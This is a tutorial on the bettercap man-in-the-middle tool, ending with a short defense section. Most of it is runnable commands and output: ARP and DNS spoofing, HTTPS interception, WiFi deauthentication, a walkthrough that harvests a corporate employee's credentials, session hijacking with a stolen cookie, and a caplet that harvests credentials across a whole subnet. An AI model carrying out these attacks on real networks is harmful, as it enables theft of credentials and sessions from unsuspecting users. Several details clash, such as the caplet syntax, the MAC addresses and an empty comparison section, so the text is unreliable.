What Is Bettercap?

Bettercap is an open-source, modular network attack and monitoring tool written in Go by Simone "evilsocket" Margaritelli. It was conceived as a modern replacement for Ettercap, the classic man-in-the-middle (MITM) tool that had become abandoned, poorly maintained, and increasingly difficult to use in contemporary network environments.

Where Ettercap was a monolithic application with a dated GTK interface and brittle plugin system, bettercap was architected from the ground up around three principles:

• Modularity: Every capability — ARP spoofing, DNS spoofing, HTTP proxy, HTTPS stripping — is a self-contained Go module that can be loaded, configured, and unloaded independently
• Live interaction: Bettercap has a built-in interactive UI (TUI) that lets you reconfigure the running instance in real time without restarting the process
• Scriptability: Attack sequences can be written as "caplets" — small Ruby-like scripts — and executed non-interactively for automation

Bettercap handles reconnaissance (passive discovery of hosts, devices, and WiFi networks), spoofing (ARP, DNS, DHCP), proxying (HTTP, HTTPS, HTTP-2), and credential extraction across all stages of a network assessment. It runs on Linux, macOS, and Windows (via WSL2) and has largely displaced Ettercap in professional penetration testing toolkits.

Installation

On Kali Linux

$ sudo apt update && sudo apt install bettercap
$ # Verify installation
$ bettercap -version
bettercap v2.32.0 (built for go1.21 using go modules)

On Raspberry Pi (ARM)

$ # Download the pre-built ARM binary
$ wget https://github.com/bettercap/bettercap/releases/download/v2.32.0/ \
  bettercap_v2.32.0_linux_arm64.zip
$ unzip bettercap_v2.32.0_linux_arm64.zip
$ sudo mv bettercap /usr/local/bin/
$ sudo setcap cap_net_admin,cap_net_raw,cap_net_bind_service=eip /usr/local/bin/bettercap

On macOS

$ brew install bettercap
$ # Or via Go:
$ go install github.com/bettercap/bettercap@latest

On Windows (via WSL2)

$ # Install WSL2 and Kali Linux from Microsoft Store
$ wsl -d kali-linux
$ sudo apt update && sudo apt install bettercap
$ # Note: you need a WiFi adapter with monitor mode support (external Alfa recommended)

Core Capabilities

Reconnaissance Module

The net.recon module performs passive network reconnaissance by listening for ARP broadcasts and ICMP neighbor advertisements. It builds a live table of devices on the local network — IP address, MAC address, vendor (via OUI lookup), hostname (via reverse DNS), and first/last seen timestamps.

$ sudo bettercap -iface eth0

╔═══════════════════════════════════════════════════════════════╗
║  bettercap v2.32.0 — type 'help' for a list of commands     ║
╚═══════════════════════════════════════════════════════════════╝

bettercap> net.probe on
[net.probe] module enabled: probing all hosts on the network

bettercap> net.show
[...] IP              MAC             Vendor            Hostname
[...] 192.168.1.1     AA:BB:CC:DD:EE:01  Netgear           router.local
[...] 192.168.1.42     AA:BB:CC:DD:EE:02  Apple, Inc.       iPhone-Jasons
[...] 192.168.1.101    AA:BB:CC:DD:EE:03  Samsung           Samsung-TV
[...] 192.168.1.108    AA:BB:CC:DD:EE:04  Dell Inc.         workstation03

WiFi Reconnaissance

$ bettercap> wifi.interface wlan0
[wifi] monitoring enabled on wlan0

bettercap> wifi.recon on
[wifi.recon] started, channel hopping every 2s

bettercap> wifi.show
[...] BSSID             SSID              CH  ENC     CLIENTS
[...] AA:BB:CC:DD:EE:0A  Corporate_5G      36  WPA2    12
[...] AA:BB:CC:DD:EE:0B  Corporate         11  WPA2    34
[...] AA:BB:CC:DD:EE:0C  Guest_WiFi         6  OPEN     8
[...] AA:BB:CC:DD:EE:0D  FreeWiFi          48  OPEN     2

Key Modules

arp.spoof — ARP Spoofing

The arp.spoof module performs ARP cache poisoning to position bettercap as a man-in-the-middle on a switched network. It continuously sends forged ARP replies to the target and the default gateway, poisoning both ARP caches so all traffic flows through the attacker.

$ bettercap> set arp.spoof.targets 192.168.1.42
[...] Set arp.spoof.targets to 192.168.1.42

bettercap> set arp.spoof.internal true
[...] Also spoof the gateway's ARP table (full LAN MITM)

bettercap> arp.spoof on
[arp.spoof] module enabled: ARP spoofing 192.168.1.42
[arp.spoof] Sent forged ARP reply: 192.168.1.1 is at AA:BB:CC:DD:EE:FF

dns.spoof — DNS Spoofing

The dns.spoof module resolves DNS queries to attacker-controlled IP addresses. Combined with the HTTP proxy, it enables phishing campaigns where targets visiting mail.google.com are redirected to a clone hosted on the attacker's machine.

$ bettercap> set dns.spoof.address 192.168.1.105
[...] Set dns.spoof.address to 192.168.1.105

bettercap> set dns.spoof.domains *
[...] Spoof all domains (* wildcard)

bettercap> dns.spoof on
[dns.spoof] module enabled: DNS spoofing for *
[dns.spoof] 192.168.1.42 asked for mail.google.com → 192.168.1.105
[dns.spoof] 192.168.1.42 asked for vpn.corp.local → 192.168.1.105

http.proxy — HTTP Proxy

The http.proxy module intercepts and optionally modifies HTTP traffic. It can inject HTML, JavaScript, or CSS into responses, log POST credentials, and redirect users. With SSL stripping enabled, it also strips HTTPS from responses before forwarding.

$ bettercap> set http.proxy.script /usr/local/bettercap/scripts/inject.js
[...] Loaded injection script

bettercap> set http.proxy.injectjs 'alert("XSS by Bettercap")'
[...] Set JavaScript injection payload

bettercap> http.proxy on
[http.proxy] module enabled on 0.0.0.0:80
[http.proxy] POST https://mail.google.com/m:[email protected]
[http.proxy] POST http://192.168.1.1/login:admin|P@ssw0rd!

https.proxy — HTTPS Proxy

The https.proxy module (also called bettercap-tls in older versions) performs HTTPS interception using a dynamically generated CA. When a target browses to an HTTPS site, bettercap generates a certificate on-the-fly signed by its own CA, presents it to the client, and terminates the TLS connection at the proxy. The proxy then opens its own TLS connection to the real destination. This is SSL/TLS MITM, not a weakness in HTTPS itself.

$ bettercap> set https.proxy.enabled true
bettercap> set https.proxy.cert /usr/local/bettercap/certs/ca.pem
bettercap> set https.proxy.key /usr/local/bettercap/certs/ca.key
bettercap> https.proxy on
[https.proxy] MITM proxy enabled, using certificate authority: CA_2026
[https.proxy] Intercepted HTTPS request: linkedin.com (TLS 1.3)
[https.proxy] Forwarded to: 108.174.10.10:443

wifi — WiFi Reconnaissance and Attacks

The wifi module provides WiFi reconnaissance (channel hopping, SSID discovery, client tracking) and deauthentication attacks. It can send targeted or broadcast deauth frames to disconnect clients from legitimate APs, forcing them to reconnect — ideally to the attacker's fake AP.

$ bettercap> wifi.recon on
bettercap> wifi.deauth AA:BB:CC:DD:EE:0B
[wifi.deauth] Sending deauth to all clients on AA:BB:CC:DD:EE:0B (Corporate)
[wifi.deauth] Sent 50 deauth frames, 18 clients affected

Real Attack Walkthrough

Scenario: Credential Theft on a Corporate Network

This walkthrough demonstrates a complete man-in-the-middle attack to harvest credentials from an unsuspecting employee on a switched corporate LAN.

$ # Step 1: Launch bettercap with a clean slate
$ sudo bettercap -iface eth0 -caplet /usr/local/share/bettercap/caplets/hide-seen.cap

[syslog] Loaded syslog events watcher
[net.recon] module enabled: starting network reconnaissance

# Step 2: Probe the network and identify targets
bettercap> net.probe on
bettercap> wait 5
bettercap> net.show
[...] Target identified: 192.168.1.108 (Dell workstation)

# Step 3: Enable ARP spoofing against the target and gateway
bettercap> set arp.spoof.targets 192.168.1.108
bettercap> set arp.spoof.internal true
bettercap> arp.spoof on
[arp.spoof] ARP spoofing active — MITM position established

# Step 4: Enable HTTP proxy to log POST credentials
bettercap> set http.proxy.on true
bettercap> http.proxy on
[http.proxy] HTTP proxy enabled on :80

# Step 5: Enable HTTPS proxy for SSL stripping
bettercap> set https.proxy.enabled true
bettercap> https.proxy on
[https.proxy] HTTPS MITM proxy active

# Step 6: Enable DNS spoofing to redirect a phishing page
bettercap> set dns.spoof.address 192.168.1.105
bettercap> set dns.spoof.domains vpn.corp.local
bettercap> dns.spoof on

# Step 7: Watch credentials appear in real time
[http.proxy] POST https://corp-sso.acmecorp.com/login
    username: j.smith
    password: C0rpVpn#2026!
    IP: 192.168.1.108 | MAC: AA:BB:CC:DD:EE:03

# Step 8: Capture session cookies for session hijacking
[http.proxy] Cookie: SESSIONID=9f8a7b6c5d4e3f2a1b0c
    Host: webmail.acmecorp.com | Path: /

Session Hijacking with Captured Cookies

$ # Take the captured SESSIONID and inject it into your browser cookie jar
$ # Using browser dev tools or EditThisCookie Chrome extension:
$ # Document.cookie = "SESSIONID=9f8a7b6c5d4e3f2a1b0c"; document.location="https://webmail.acmecorp.com";
[session] Now authenticated as j.smith in your browser session

Caplets — Pre-Written Attack Scripts

Bettercap's caplets are small scripts written in caplet's own DSL (based on Go's expression syntax) that automate complex multi-module attacks. Rather than manually typing commands, you execute a single caplet file that configures all modules, sets targets, and launches attacks in the correct sequence.

$ # List available caplets
$ ls /usr/local/share/bettercap/caplets/
dns-spoof.cap      http-req-dump.cap    mii-tool.cap
example.cap        http-simple-auth.cap  net-recon.cap
ftp-mitm.cap       http-ui.cap           wifi-jammer.cap

$ # Run a credential harvesting caplet
$ sudo bettercap -caplet /usr/local/share/bettercap/caplets/http-simple-auth.cap

[caplet] Loaded: http-simple-auth.cap
[http.proxy] Proxy enabled, will intercept basic auth
[arp.spoof] ARP spoofing all hosts on the network

$ # Example: custom credential harvester caplet
$ cat ~/my-harvester.cap

# Custom credential harvester for corporate assessment
set arp.spoof.targets 192.168.1.0/24
set arp.spoof.internal true
arp.spoof on
set http.proxy.on true
set http.proxy.script /usr/local/bettercap/scripts/creds-logger.js
http.proxy on
set https.proxy.enabled true
https.proxy on
set dns.spoof.address 192.168.1.105
set dns.spoof.domains *.acmecorp.com
dns.spoof on

Comparison: Bettercap vs. Mana Toolkit

In practice, penetration testers use both: Mana for WiFi-specific Evil Twin assessments (especially corporate WPA2-Enterprise environments) and bettercap for wired LAN MITM engagements where ARP spoofing on an existing switch is sufficient.

Detection and Defense

Defenders should be aware that bettercap's ARP spoofing is detectable with the right tooling:

• Static ARP entries: On critical infrastructure, configure static ARP entries for the default gateway. This prevents dynamic spoofing but creates management overhead.
• ARPWatch / arpalert: These tools monitor ARP tables for unexpected changes and alert when a MAC address suddenly claims a new IP — a classic MITM indicator.
• 802.1X Port-Based Network Access Control (PNAC): The most effective defense. When the switch authenticates connected devices via 802.1X (and optionally EAP-TLS), an attacker cannot easily inject themselves without a valid supplicant certificate.
• HTTPS everywhere + certificate pinning: Even if bettercap intercepts HTTPS traffic via MITM, certificate pinning in modern browsers and mobile apps causes the connection to fail rather than fall back to HTTP.
• LLMNR/NBT-NS disabling: Disable LLMNR (UDP port 5355) and NetBIOS Name Service via Group Policy. This prevents bettercap's Responder integration from capturing hashes trivially.